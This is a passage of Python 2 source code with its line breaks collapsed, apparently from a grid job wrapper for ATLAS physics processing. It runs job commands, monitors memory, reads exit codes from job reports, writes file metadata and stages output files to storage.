FAX_dictionary.has_key('bytesWithoutFAX'): job.bytesWithoutFAX = FAX_dictionary['bytesWithoutFAX'] if FAX_dictionary.has_key('bytesWithFAX'): job.bytesWithFAX = FAX_dictionary['bytesWithFAX'] if FAX_dictionary.has_key('usedFAXandDirectIO'): usedFAXandDirectIO = FAX_dictionary['usedFAXandDirectIO'] return job, ins, statusPFCTurl, usedFAXandDirectIO def getTrfExitInfo(self, exitCode, workdir): """ Get the trf exit code and info from job report if possible """ exitAcronym = "" exitMsg = "" # does the job report exist? extension = getExtension(alternative='pickle') if extension.lower() == "json": _filename = "jobReport.%s" % (extension) else: _filename = "jobReportExtract.%s" % (extension) filename = os.path.join(workdir, _filename) if os.path.exists(filename): tolog("Found job report: %s" % (filename)) # wait a few seconds to make sure the job report is finished tolog("Taking a 5s nap to make sure the job report is finished") time.sleep(5) # first backup the jobReport to the job workdir since it will be needed later # (the current location will disappear since it will be tarred up in the jobs' log file) d = os.path.join(workdir, '..') try: copy2(filename, os.path.join(d, _filename)) except Exception, e: tolog("Warning: Could not backup %s to %s: %s" % (_filename, d, e)) else: tolog("Backed up %s to %s" % (_filename, d)) # search for the exit code try: f = open(filename, "r") except Exception, e: tolog("!!WARNING!!1112!! Failed to open job report: %s" % (e)) else: if extension.lower() == "json": from json import load else: from pickle import load data = load(f) # extract the exit code and info _exitCode = self.extractDictionaryObject("exitCode", data) if _exitCode: if _exitCode == 0 and exitCode != 0: tolog("!!WARNING!!1111!! Detected inconsistency in %s: exitcode listed as 0 but original trf exit code was %d (using original error code)" %\ (filename, exitCode)) else: exitCode = _exitCode _exitAcronym = self.extractDictionaryObject("exitAcronym", data) if _exitAcronym: exitAcronym = _exitAcronym _exitMsg = self.extractDictionaryObject("exitMsg", data) if _exitMsg: exitMsg = _exitMsg f.close() tolog("Trf exited with:") tolog("...exitCode=%d" % (exitCode)) tolog("...exitAcronym=%s" % (exitAcronym)) tolog("...exitMsg=%s" % (exitMsg)) else: tolog("Job report not found: %s" % (filename)) return exitCode, exitAcronym, exitMsg def extractDictionaryObject(self, obj, dictionary): """ Extract an object from a dictionary """ _obj = None try: _obj = dictionary[obj] except Exception, e: tolog("Object %s not found in dictionary" % (obj)) else: tolog('Extracted \"%s\"=%s from dictionary' % (obj, _obj)) return _obj def getMemoryUtilityCommand(self, pid, summary="summary.json"): """ Prepare the memory utility command string """ interval = 60 path = "/afs/cern.ch/work/n/nrauschm/public/MemoryMonitoringTool/MemoryMonitor" cmd = "" try: tolog("2. 
Process id of job command: %d" % (pid)) except Exception, e: tolog("Exception caught: %s" % (e)) # Construct the name of the output file using the summary variable if summary.endswith('.json'): output = summary.replace('.json', '.txt') else: output = summary + '.txt' if os.path.exists(path): cmd = "%s --pid %d --filename %s --json-summary %s --interval %d" % (path, pid, output, summary, interval) else: tolog("Path does not exist: %s" % (path)) return cmd def executePayload(self, thisExperiment, runCommandList, job): """ execute the payload """ # do not hide the proxy for PandaMover since it needs it or for sites that has sc.proxy = donothide # if 'DDM' not in jobSite.sitename and readpar('proxy') != 'donothide': # # create the proxy guard object (must be created here before the sig2exc()) # proxyguard = ProxyGuard() # # # hide the proxy # hP_ret = proxyguard.hideProxy() # if not hP_ret: # tolog("Warning: Proxy exposed to payload") # run the payload process, which could take days to finish t0 = os.times() tolog("t0 = %s" % str(t0)) res_tuple = (0, 'Undefined') multi_trf = self.isMultiTrf(runCommandList) _stdout = job.stdout _stderr = job.stderr # loop over all run commands (only >1 for multi-trfs) current_job_number = 0 getstatusoutput_was_interrupted = False number_of_jobs = len(runCommandList) for cmd in runCommandList: current_job_number += 1 # create the stdout/err files if multi_trf: job.stdout = _stdout.replace(".txt", "_%d.txt" % (current_job_number)) job.stderr = _stderr.replace(".txt", "_%d.txt" % (current_job_number)) file_stdout, file_stderr = self.getStdoutStderrFileObjects(stdoutName=job.stdout, stderrName=job.stderr) if not (file_stdout and file_stderr): res_tuple = (1, "Could not open stdout/stderr files, piping not possible") tolog("!!WARNING!!2222!! %s" % (res_tuple[1])) break try: # add the full job command to the job_setup.sh file to_script = cmd.replace(";", ";\n") thisExperiment.updateJobSetupScript(job.workdir, to_script=to_script) tolog("Executing job command %d/%d" % (current_job_number, number_of_jobs)) # Start the subprocess main_subprocess = self.getSubprocess(thisExperiment, cmd, stdout=file_stdout, stderr=file_stderr) if main_subprocess: time.sleep(2) try: tolog("Process id of job command: %d" % (main_subprocess.pid)) except Exception, e: tolog("1. Exception caught: %s" % (e)) # Start the memory utility if required mem_subprocess = None if thisExperiment.shouldExecuteMemoryMonitor(): summary = thisExperiment.getMemoryMonitorJSONFilename() mem_cmd = self.getMemoryUtilityCommand(main_subprocess.pid, summary=summary) if mem_cmd != "": mem_subprocess = self.getSubprocess(thisExperiment, mem_cmd) if mem_subprocess: try: tolog("Process id of memory monitor: %d" % (mem_subprocess.pid)) except Exception, e: tolog("3. Exception caught: %s" % (e)) else: tolog("Could not launch memory monitor since the command path does not exist") else: tolog("Not required to run memory monitor") # Loop until the main subprocess has finished while main_subprocess.poll() is None: # .. # Take a short nap time.sleep(1) # Stop the memory monitor if mem_subprocess: mem_subprocess.send_signal(signal.SIGUSR1) tolog("Terminated the memory monitor subprocess") # Move the output JSON to the pilots init dir try: copy2("%s/*.json" % (job.workdir), "%s/." % (self.__pworkdir)) except Exception, e: tolog("!!WARNING!!2222!! 
Caught exception while trying to copy JSON files: %s" % (e)) # Handle main subprocess errors try: stdout = open(job.stdout, 'r') res_tuple = (main_subprocess.returncode, tail(stdout)) except Exception, e: tolog("!!WARNING!!3002!! Failed during tail operation: %s" % (e)) else: tolog("Tail:\n%s" % (res_tuple[1])) stdout.close() else: res_tuple = (1, "Popen ended prematurely (payload command failed to execute, see stdout/err)") tolog("!!WARNING!!3001!! %s" % (res_tuple[1])) except Exception, e: tolog("!!FAILED!!3000!! Failed to run command: %s" % str(e)) getstatusoutput_was_interrupted = True if self.__failureCode: job.result[2] = self.__failureCode tolog("!!FAILED!!3000!! Failure code: %d" % (self.__failureCode)) break else: if res_tuple[0] == 0: tolog("Job command %d/%d finished" % (current_job_number, number_of_jobs)) else: tolog("Job command %d/%d failed: res = %s" % (current_job_number, number_of_jobs, str(res_tuple))) break t1 = os.times() tolog("t1 = %s" % str(t1)) t = map(lambda x, y:x-y, t1, t0) # get the time consumed job.cpuConsumptionUnit, job.cpuConsumptionTime, job.cpuConversionFactor = pUtil.setTimeConsumed(t) tolog("Job CPU usage: %s %s" % (job.cpuConsumptionTime, job.cpuConsumptionUnit)) tolog("Job CPU conversion factor: %1.10f" % (job.cpuConversionFactor)) job.timeExe = int(round(t1[4] - t0[4])) tolog("Original exit code: %d" % (res_tuple[0])) tolog("Exit code: %d (returned from OS)" % (res_tuple[0]%255)) # check the job report for any exit code that should replace the res_tuple[0] res0, exitAcronym, exitMsg = self.getTrfExitInfo(res_tuple[0], job.workdir) res = (res0, res_tuple[1], exitMsg) # dump an extract of the payload output if number_of_jobs > 1: _stdout = job.stdout _stderr = job.stderr _stdout = _stdout.replace(".txt", "_N.txt") _stderr = _stderr.replace(".txt", "_N.txt") tolog("NOTE: For %s output, see files %s, %s (N = [1, %d])" % (job.payload, _stdout, _stderr, number_of_jobs)) else: tolog("NOTE: For %s output, see files %s, %s" % (job.payload, job.stdout, job.stderr)) # JEM job-end callback try: from JEMstub import notifyJobEnd2JEM notifyJobEnd2JEM(job, tolog) except: pass # don't care (fire and forget) # restore the proxy #if hP_ret: # rP_ret = proxyguard.restoreProxy() # if not rP_ret: # tolog("Warning: Problems with storage can occur since proxy could not be restored") # else: # hP_ret = False # tolog("ProxyGuard has finished successfully") return res, job, getstatusoutput_was_interrupted, current_job_number def moveTrfMetadata(self, workdir, jobId): """ rename and copy the trf metadata """ oldMDName = "%s/metadata.xml" % (workdir) _filename = "metadata-%s.xml.PAYLOAD" % (jobId) newMDName = "%s/%s" % (workdir, _filename) try: os.rename(oldMDName, newMDName) except: tolog("Warning: Could not open the original %s file, but harmless, pass it" % (oldMDName)) pass else: tolog("Renamed %s to %s" % (oldMDName, newMDName)) # now move it to the pilot work dir try: copy2(newMDName, "%s/%s" % (self.__pworkdir, _filename)) except Exception, e: tolog("Warning: Could not copy %s to site work dir: %s" % (_filename, str(e))) else: tolog("Metadata was transferred to site work dir: %s/%s" % (self.__pworkdir, _filename)) def createFileMetadata(self, outFiles, job, outsDict, dsname, datasetDict, sitename, analysisJob=False): """ create the metadata for the output + log files """ ec = 0 # get/assign guids to the output files if outFiles: if not pUtil.isBuildJob(outFiles): ec, job.pilotErrorDiag, job.outFilesGuids = RunJobUtilities.getOutFilesGuids(job.outFiles, job.workdir) if 
ec: # missing PoolFileCatalog (only error code from getOutFilesGuids) return ec, job, None else: tolog("Build job - do not use PoolFileCatalog to get guid (generated)") else: tolog("This job has no output files") # get the file sizes and checksums for the local output files # WARNING: any errors are lost if occur in getOutputFileInfo() ec, pilotErrorDiag, fsize, checksum = pUtil.getOutputFileInfo(list(outFiles), getChecksumCommand(), skiplog=True, logFile=job.logFile) if ec != 0: tolog("!!FAILED!!2999!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], ec, job, pilotErrorDiag=pilotErrorDiag) if self.__logguid: guid = self.__logguid else: guid = job.tarFileGuid # create preliminary metadata (no metadata yet about log file - added later in pilot.py) _fname = "%s/metadata-%s.xml" % (job.workdir, job.jobId) try: _status = pUtil.PFCxml(job.experiment, _fname, list(job.outFiles), fguids=job.outFilesGuids, fntag="lfn", alog=job.logFile, alogguid=guid,\ fsize=fsize, checksum=checksum, analJob=analysisJob) except Exception, e: pilotErrorDiag = "PFCxml failed due to problematic XML: %s" % (e) tolog("!!WARNING!!1113!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], error.ERR_MISSINGGUID, job, pilotErrorDiag=pilotErrorDiag) else: if not _status: pilotErrorDiag = "Missing guid(s) for output file(s) in metadata" tolog("!!FAILED!!2999!! %s" % (pilotErrorDiag)) self.failJob(job.result[1], error.ERR_MISSINGGUID, job, pilotErrorDiag=pilotErrorDiag) tolog("..............................................................................................................") tolog("Created %s with:" % (_fname)) tolog(".. log : %s (to be transferred)" % (job.logFile)) tolog(".. log guid : %s" % (guid)) tolog(".. out files : %s" % str(job.outFiles)) tolog(".. out file guids : %s" % str(job.outFilesGuids)) tolog(".. fsize : %s" % str(fsize)) tolog(".. checksum : %s" % str(checksum)) tolog("..............................................................................................................") # convert the preliminary metadata-<jobId>.xml file to OutputFiles-<jobId>.xml for NG and for CERNVM # note: for CERNVM this is only really needed when CoPilot is used if os.environ.has_key('Nordugrid_pilot') or sitename == 'CERNVM': if RunJobUtilities.convertMetadata4NG(os.path.join(job.workdir, job.outputFilesXML), _fname, outsDict, dsname, datasetDict): tolog("Metadata has been converted to NG/CERNVM format") else: job.pilotErrorDiag = "Could not convert metadata to NG/CERNVM format" tolog("!!WARNING!!1999!! %s" % (job.pilotErrorDiag)) # try to build a file size and checksum dictionary for the output files # outputFileInfo: {'a.dat': (fsize, checksum), ...} # e.g.: file size for file a.dat: outputFileInfo['a.dat'][0] # checksum for file a.dat: outputFileInfo['a.dat'][1] try: # remove the log entries _fsize = fsize[1:] _checksum = checksum[1:] outputFileInfo = dict(zip(job.outFiles, zip(_fsize, _checksum))) except Exception, e: tolog("!!WARNING!!2993!! 
Could not create output file info dictionary: %s" % str(e)) outputFileInfo = {} else: tolog("Output file info dictionary created: %s" % str(outputFileInfo)) return ec, job, outputFileInfo def getDatasets(self, job): """ get the datasets for the output files """ # get the default dataset if job.destinationDblock and job.destinationDblock[0] != 'NULL' and job.destinationDblock[0] != ' ': dsname = job.destinationDblock[0] else: dsname = "%s-%s-%s" % (time.localtime()[0:3]) # pass it a random name # create the dataset dictionary # (if None, the dsname above will be used for all output files) datasetDict = getDatasetDict(job.outFiles, job.destinationDblock, job.logFile, job.logDblock) if datasetDict: tolog("Dataset dictionary has been verified") else: tolog("Dataset dictionary could not be verified, output files will go to: %s" % (dsname)) return dsname, datasetDict def stageOut(self, job, jobSite, outs, analysisJob, dsname, datasetDict, outputFileInfo): """ perform the stage-out """ error = PilotErrors() pilotErrorDiag = "" rc = 0 latereg = False rf = None # generate the xml for the output files and the site mover pfnFile = "OutPutFileCatalog.xml" try: _status = pUtil.PFCxml(job.experiment, pfnFile, outs, fguids=job.outFilesGuids, fntag="pfn") except Exception, e: job.pilotErrorDiag = "PFCxml failed due to problematic XML: %s" % (e) tolog("!!WARNING!!1113!! %s" % (job.pilotErrorDiag)) return error.ERR_MISSINGGUID, job, rf, latereg else: if not _status: job.pilotErrorDiag = "Metadata contains missing guid(s) for output file(s)" tolog("!!WARNING!!2999!! %s" % (job.pilotErrorDiag)) return error.ERR_MISSINGGUID, job, rf, latereg tolog("Using the newly-generated %s/%s for put operation" % (job.workdir, pfnFile)) # the cmtconfig is needed by at least the xrdcp site mover cmtconfig = getCmtconfig(job.cmtconfig) rs = "" # return string from put_data with filename in case of transfer error tin_0 = os.times() try: rc, job.pilotErrorDiag, rf, rs, job.filesNormalStageOut, job.filesAltStageOut = mover.mover_put_data("xmlcatalog_file:%s" % (pfnFile), dsname, jobSite.sitename,\ ub=jobSite.dq2url, analysisJob=analysisJob, pinitdir=self.__pilot_initdir, scopeOut=job.scopeOut,\ proxycheck=self.__proxycheckFlag, spsetup=job.spsetup, token=job.destinationDBlockToken,\ userid=job.prodUserID, datasetDict=datasetDict, prodSourceLabel=job.prodSourceLabel,\ outputDir=self.__outputDir, jobId=job.jobId, jobWorkDir=job.workdir, DN=job.prodUserID,\ dispatchDBlockTokenForOut=job.dispatchDBlockTokenForOut, outputFileInfo=outputFileInfo,\ lfcreg=self.__fileCatalogRegistration, jobDefId=job.jobDefinitionID, jobCloud=job.cloud, logFile=job.logFile,\ stageoutTries=self.__stageoutretry, cmtconfig=cmtconfig, experiment=self.__experiment, fileDestinationSE=job.fileDestinationSE) tin_1 = os.times() job.timeStageOut = int(round(tin_1[4] - tin_0[4])) except Exception, e: tin_1 = os.times() job.timeStageOut = int(round(tin_1[4] - tin_0[4])) if 'format_exc' in traceback.__all__: trace = traceback.format_exc() pilotErrorDiag = "Put function can not be called for staging out: %s, %s" % (str(e), trace) else: tolog("traceback.format_exc() not available in this python version") pilotErrorDiag = "Put function can not be called for staging out: %s" % (str(e)) tolog("!!WARNING!!3000!! 
%s" % (pilotErrorDiag)) rc = error.ERR_PUTFUNCNOCALL job.setState(["holding", job.result[1], rc]) else: if job.pilotErrorDiag != "": if job.pilotErrorDiag.startswith("Put error:"): pre = "" else: pre = "Put error: " job.pilotErrorDiag = pre + tailPilotErrorDiag(job.pilotErrorDiag, size=256-len("pilot: Put error: ")) tolog("Put function returned code: %d" % (rc)) if rc != 0: # remove any trailing "\r" or "\n" (there can be two of them) if rs != None: rs = rs.rstrip() tolog("Error string: %s" % (rs)) # is the job recoverable? if error.isRecoverableErrorCode(rc): _state = "holding" _msg = "WARNING" else: _state = "failed" _msg = "FAILED" # look for special error in the error string if rs == "Error: string Limit exceeded 250": tolog("!!%s!!3000!! Put error: file name string limit exceeded 250" % (_msg)) job.setState([_state, job.result[1], error.ERR_LRCREGSTRSIZE]) else: job.setState([_state, job.result[1], rc]) tolog("!!%s!!1212!! %s" % (_msg, error.getErrorStr(rc))) else: # set preliminary finished (may be overwritten below in the LRC registration) job.setState(["finished", 0, 0]) # create a weak lockfile meaning that file transfer worked # (useful for job recovery if activated) in the job workdir createLockFile(True, jobSite.workdir, lockfile="ALLFILESTRANSFERRED") # create another lockfile in the site workdir since a transfer failure can still occur during the log transfer # and a later recovery attempt will fail (job workdir will not exist at that time) createLockFile(True, self.__pworkdir, lockfile="ALLFILESTRANSFERRED") if job.result[0] == "holding" and '(unrecoverable)' in job.pilotErrorDiag: job.result[0] = "failed" tolog("!!WARNING!!2999!! HOLDING state changed to FAILED since error is unrecoverable") return rc, job, rf, latereg def copyInputForFiles(self, workdir): """ """ try: cmd = "cp %s/inputFor_* %s" % (self.__pilot_initdir, workdir) tolog("Executing command: %s" % (cmd)) out = commands.getoutput(cmd) except IOError, e: pass tolog(out) def getStdoutStderrFileObjects(self, stdoutName="stdout.txt", stderrName="stderr.txt"): """ Create stdout/err file objects """ try: stdout = open(os.path.join(os.getcwd(), stdoutName), "w") stderr = open(os.path.join(os.getcwd(), stderrName), "w") except Exception, e: tolog("!!WARNING!!3330!! Failed to open stdout/err files: %s" % (e)) stdout = None stderr = None return stdout, stderr def getSubprocess(self, thisExperiment, runCommand, stdout=None, stderr=None): """ Execute a command as a subprocess """ # Execute and return the subprocess object return thisExperiment.getSubprocess(runCommand, stdout=stdout, stderr=stderr) # Methods used by event service RunJob* modules .............................................................. 
def stripSetupCommand(self, cmd, trfName): """ Remove the trf part of the setup command """ location = cmd.find(trfName) return cmd[:location] def executeMakeRunEventCollectionScript(self, cmd, eventcollection_filename): """ Define and execute the event collection script """ cmd += "get_files -jo %s" % (eventcollection_filename) tolog("Execute command: %s" % (cmd)) # WARNING: PUT A TIMER AROUND THIS COMMAND rc, rs = commands.getstatusoutput(cmd) return rc, rs def prependMakeRunEventCollectionScript(self, input_file, output_file, eventcollection_filename): """ Prepend the event collection script """ status = False eventcollection_filename_mod = "" with open(eventcollection_filename) as f1: eventcollection_filename_mod = eventcollection_filename.replace(".py",".2.py") with open(eventcollection_filename_mod, "w") as f2: f2.write("EvtMax = -1\n") f2.write("In = [ \'%s\' ]\n" % (input_file)) f2.write("Out = \'%s\'\n" % (output_file)) for line in f1: f2.write(line) f2.close() f1.close() status = True return status, eventcollection_filename_mod def executeTAGFileCommand(self, cmd, eventcollection_filename_mod): """ Execute the TAG file creation script using athena """ cmd += "athena.py %s >MakeRunEventCollection-stdout.txt" % (eventcollection_filename_mod) tolog("Executing command: %s" % (cmd)) # WARNING: PUT A TIMER AROUND THIS COMMAND rc, rs = commands.getstatusoutput(cmd) return rc, rs def swapAthenaProcNumber(self, swap_value): """ Swap the current ATHENA_PROC_NUMBER so that it does not upset the job """ # Note: only needed during TAG file creation athena_proc_number = 0 try: athena_proc_number = int(os.environ['ATHENA_PROC_NUMBER']) except Exception, e: tolog("ATHENA_PROC_NUMBER not defined, setting it to: %s" % (swap_value)) os.environ['ATHENA_PROC_NUMBER'] = str(swap_value) else: if swap_value == 0: del os.environ['ATHENA_PROC_NUMBER'] tolog("Unset ATHENA_PROC_NUMBER") else: os.environ['ATHENA_PROC_NUMBER'] = str(swap_value) tolog("ATHENA_PROC_NUMBER swapped from \'%d\' to \'%d\'" % (athena_proc_number, swap_value)) return athena_proc_number def createTAGFile(self, jobExecutionCommand, trfName, inFiles, eventcollection_filename): """ Create a TAG file """ tag_file = "" tag_file_guid = getGUID() # We cannot have ATHENA_PROC_NUMBER set to a value larger than 1, since that will # activate AthenaMP. Reset it for now, and swap it back at the end of this method athena_proc_number = self.swapAthenaProcNumber(0) # Remove everything after the trf command from the job execution command cmd = self.stripSetupCommand(jobExecutionCommand, trfName) tolog("Stripped command: %s" % (cmd)) # Define and execute the event collection script if cmd != "": rc, rs = self.executeMakeRunEventCollectionScript(cmd, eventcollection_filename) # Prepend the event collection script if rc == 0: input_file = inFiles[0] tag_file = input_file + ".TAG" status, eventcollection_filename_mod = self.prependMakeRunEventCollectionScript(input_file, tag_file, eventcollection_filename) # Finally create the TAG file if status: rc, rs = self.executeTAGFileCommand(cmd, eventcollection_filename_mod) if rc != 0: tolog("!!WARNING!!3337!! Failed to create TAG file: rc=%d, rs=%s" % (rc, rs)) tag_file = "" else: tolog("!!WARNING!!3339!! Failed to download %s: rc=%d, rs=%s " % (eventcollection_filename, rc, rs)) else: tolog("!!WARNING!!3330!! 
Failed to strip the job execution command, cannot create TAG file") # Now swap the ATHENA_PROC_NUMBER since it is needed for activating AthenaMP dummy = self.swapAthenaProcNumber(athena_proc_number) return tag_file, tag_file_guid # (end event service methods) ................................................................................ # main process starts here if __name__ == "__main__": # Get error handler error = PilotErrors() # Get runJob object runJob = RunJob() # Define a new parent group os.setpgrp() # Protect the runJob code with exception handling hP_ret = False try: # always use this filename as the new jobDef module name import newJobDef jobSite = Site.Site() return_tuple = runJob.argumentParser() tolog("argumentParser returned: %s" % str(return_tuple)) jobSite.setSiteInfo(return_tuple) # jobSite.setSiteInfo(argParser(sys.argv[1:])) # reassign workdir for this job jobSite.workdir = jobSite.wntmpdir if runJob.getPilotLogFilename() != "": pUtil.setPilotlogFilename(runJob.getPilotLogFilename()) # set node info node = Node.Node() node.setNodeName(os.uname()[1]) node.collectWNInfo(jobSite.workdir) # redirect stder sys.stderr = open("%s/runjob.stderr" % (jobSite.workdir), "w") tolog("Current job workdir is: %s" % os.getcwd()) tolog("Site workdir is: %s" % jobSite.workdir) # get the experiment object thisExperiment = getExperiment(runJob.getExperiment()) tolog("RunJob will serve experiment: %s" % (thisExperiment.getExperiment())) # set the cache (used e.g. by LSST) if runJob.getCache(): thisExperiment.setCache(runJob.getCache()) JR = JobRecovery() try: job = Job.Job() job.workdir = jobSite.workdir job.setJobDef(newJobDef.job) job.workdir = jobSite.workdir job.experiment = runJob.getExperiment() # figure out and set payload file names job.setPayloadName(thisExperiment.getPayloadName(job)) except Exception, e: pilotErrorDiag = "Failed to process job info: %s" % str(e) tolog("!!WARNING!!3000!! %s" % (pilotErrorDiag)) runJob.failJob(0, error.ERR_UNKNOWN, job, pilotErrorDiag=pilotErrorDiag) # prepare for the output file data directory # (will only created for jobs that end up in a 'holding' state) job.datadir = runJob.getParentWorkDir() + "/PandaJob_%s_data" % (job.jobId) # register cleanup function atexit.register(runJob.cleanup, job) # to trigger an exception so that the SIGTERM signal can trigger cleanup function to run # because by default signal terminates process without cleanup. def sig2exc(sig, frm): """ signal handler """ error = PilotErrors() runJob.setGlobalPilotErrorDiag("!!FAILED!!3000!! 
SIGTERM Signal %s is caught in child pid=%d!\n" % (sig, os.getpid())) tolog(runJob.getGlobalPilotErrorDiag()) if sig == signal.SIGTERM: runJob.setGlobalErrorCode(error.ERR_SIGTERM) elif sig == signal.SIGQUIT: runJob.setGlobalErrorCode(error.ERR_SIGQUIT) elif sig == signal.SIGSEGV: runJob.setGlobalErrorCode(error.ERR_SIGSEGV) elif sig == signal.SIGXCPU: runJob.setGlobalErrorCode(error.ERR_SIGXCPU) elif sig == signal.SIGBUS: runJob.setGlobalErrorCode(error.ERR_SIGBUS) elif sig == signal.SIGUSR1: runJob.setGlobalErrorCode(error.ERR_SIGUSR1) else: runJob.setGlobalErrorCode(error.ERR_KILLSIGNAL) runJob.setFailureCode(runJob.getGlobalErrorCode()) # print to stderr print >> sys.stderr, runJob.getGlobalPilotErrorDiag() raise SystemError(sig) signal.signal(signal.SIGTERM, sig2exc) signal.signal(signal.SIGQUIT, sig2exc) signal.signal(signal.SIGSEGV, sig2exc) signal.signal(signal.SIGXCPU, sig2exc) signal.signal(signal.SIGUSR1, sig2exc) signal.signal(signal.SIGBUS, sig2exc) # see if it's an analysis job or not analysisJob = isAnalysisJob(job.trf.split(",")[0]) if analysisJob: tolog("User analysis job") else: tolog("Production job") tolog("runJob received a job with prodSourceLabel=%s" % (job.prodSourceLabel)) # setup starts here ................................................................................ # update the job state file job.jobState = "setup" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # send [especially] the process group back to the pilot job.setState([job.jobState, 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # prepare the setup and get the run command list ec, runCommandList, job, multi_trf = runJob.setup(job, jobSite, thisExperiment) if ec != 0: tolog("!!WARNING!!2999!! runJob setup failed: %s" % (job.pilotErrorDiag)) runJob.failJob(0, ec, job, pilotErrorDiag=job.pilotErrorDiag) tolog("Setup has finished successfully") # job has been updated, display it again job.displayJob() # (setup ends here) ................................................................................ tolog("Setting stage-in state until all input files have been copied") job.setState(["stagein", 0, 0]) # send the special setup string back to the pilot (needed for the log transfer on xrdcp systems) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # stage-in ......................................................................................... 
# update the job state file job.jobState = "stagein" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # update copysetup[in] for production jobs if brokerage has decided that remote I/O should be used if job.transferType == 'direct': tolog('Brokerage has set transfer type to \"%s\" (remote I/O will be attempted for input files, any special access mode will be ignored)' %\ (job.transferType)) RunJobUtilities.updateCopysetups('', transferType=job.transferType) # stage-in all input files (if necessary) job, ins, statusPFCTurl, usedFAXandDirectIO = runJob.stageIn(job, jobSite, analysisJob) if job.result[2] != 0: tolog("Failing job with ec: %d" % (ec)) runJob.failJob(0, job.result[2], job, ins=ins, pilotErrorDiag=job.pilotErrorDiag) # after stageIn, all file transfer modes are known (copy_to_scratch, file_stager, remote_io) # consult the FileState file dictionary if cmd3 should be updated (--directIn should not be set if all # remote_io modes have been changed to copy_to_scratch as can happen with ByteStream files) # and update the run command list if necessary. # in addition to the above, if FAX is used as a primary site mover and direct access is enabled, then # the run command should not contain the --oldPrefix, --newPrefix, --lfcHost options but use --usePFCTurl if job.inFiles != ['']: runCommandList = RunJobUtilities.updateRunCommandList(runCommandList, runJob.getParentWorkDir(), job.jobId, statusPFCTurl, analysisJob, usedFAXandDirectIO) # copy any present @inputFor_* files from the pilot init dir to the rundirectory (used for ES merge jobs) #runJob.copyInputForFiles(job.workdir) # (stage-in ends here) ............................................................................. # change to running state since all input files have been staged tolog("Changing to running state since all input files have been staged") job.setState(["running", 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # update the job state file job.jobState = "running" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # run the job(s) ................................................................................... # Set ATLAS_CONDDB if necessary, and other env vars RunJobUtilities.setEnvVars(jobSite.sitename) # execute the payload res, job, getstatusoutput_was_interrupted, current_job_number = runJob.executePayload(thisExperiment, runCommandList, job) # if payload leaves the input files, delete them explicitly if ins: ec = pUtil.removeFiles(job.workdir, ins) # payload error handling ed = ErrorDiagnosis() job = ed.interpretPayload(job, res, getstatusoutput_was_interrupted, current_job_number, runCommandList, runJob.getFailureCode()) if job.result[1] != 0 or job.result[2] != 0: runJob.failJob(job.result[1], job.result[2], job, pilotErrorDiag=job.pilotErrorDiag) # stage-out ........................................................................................ 
# update the job state file job.jobState = "stageout" _retjs = JR.updateJobStateTest(job, jobSite, node, mode="test") # verify and prepare and the output files for transfer ec, pilotErrorDiag, outs, outsDict = RunJobUtilities.prepareOutFiles(job.outFiles, job.logFile, job.workdir) if ec: # missing output file (only error code from prepareOutFiles) runJob.failJob(job.result[1], ec, job, pilotErrorDiag=pilotErrorDiag) tolog("outsDict: %s" % str(outsDict)) # update the current file states updateFileStates(outs, runJob.getParentWorkDir(), job.jobId, mode="file_state", state="created") dumpFileStates(runJob.getParentWorkDir(), job.jobId) # create xml string to pass to dispatcher for atlas jobs outputFileInfo = {} if outs or (job.logFile and job.logFile != ''): # get the datasets for the output files dsname, datasetDict = runJob.getDatasets(job) # re-create the metadata.xml file, putting guids of ALL output files into it. # output files that miss guids from the job itself will get guids in PFCxml function # first rename and copy the trf metadata file for non-build jobs if not pUtil.isBuildJob(outs): runJob.moveTrfMetadata(job.workdir, job.jobId) # create the metadata for the output + log files ec, job, outputFileInfo = runJob.createFileMetadata(list(outs), job, outsDict, dsname, datasetDict, jobSite.sitename, analysisJob=analysisJob) if ec: runJob.failJob(0, ec, job, pilotErrorDiag=job.pilotErrorDiag) # move output files from workdir to local DDM area finalUpdateDone = False if outs: tolog("Setting stage-out state until all output files have been copied") job.setState(["stageout", 0, 0]) rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort()) # stage-out output files ec, job, rf, latereg = runJob.stageOut(job, jobSite, outs, analysisJob, dsname, datasetDict, outputFileInfo) # error handling if job.result[0] == "finished" or ec == error.ERR_PUTFUNCNOCALL: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True) else: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True, latereg=latereg) if ec == error.ERR_NOSTORAGE: # update the current file states for all files since nothing could be transferred updateFileStates(outs, runJob.getParentWorkDir(), job.jobId, mode="file_state", state="not_transferred") dumpFileStates(runJob.getParentWorkDir(), job.jobId) finalUpdateDone = True if ec != 0: runJob.sysExit(job, rf) # (stage-out ends here) ....................................................................... job.setState(["finished", 0, 0]) if not finalUpdateDone: rt = RunJobUtilities.updatePilotServer(job, runJob.getPilotServer(), runJob.getPilotPort(), final=True) runJob.sysExit(job) except Exception, errorMsg: error = PilotErrors() if runJob.getGlobalPilotErrorDiag() != "": pilotErrorDiag = "Exception caught in runJob: %s" % (runJob.getGlobalPilotErrorDiag()) else: pilotErrorDiag = "Exception caught in runJob: %s" % str(errorMsg) if 'format_exc' in traceback.__all__: pilotErrorDiag += ", " + traceback.format_exc() try: tolog("!!FAILED!!3001!! %s" % (pilotErrorDiag)) except Exception, e: if len(pilotErrorDiag) > 10000: pilotErrorDiag = pilotErrorDiag[:10000] tolog("!!FAILED!!3001!! Truncated (%s): %s" % (e, pilotErrorDiag)) else: pilotErrorDiag = "Exception caught in runJob: %s" % (e) tolog("!!FAILED!!3001!! 
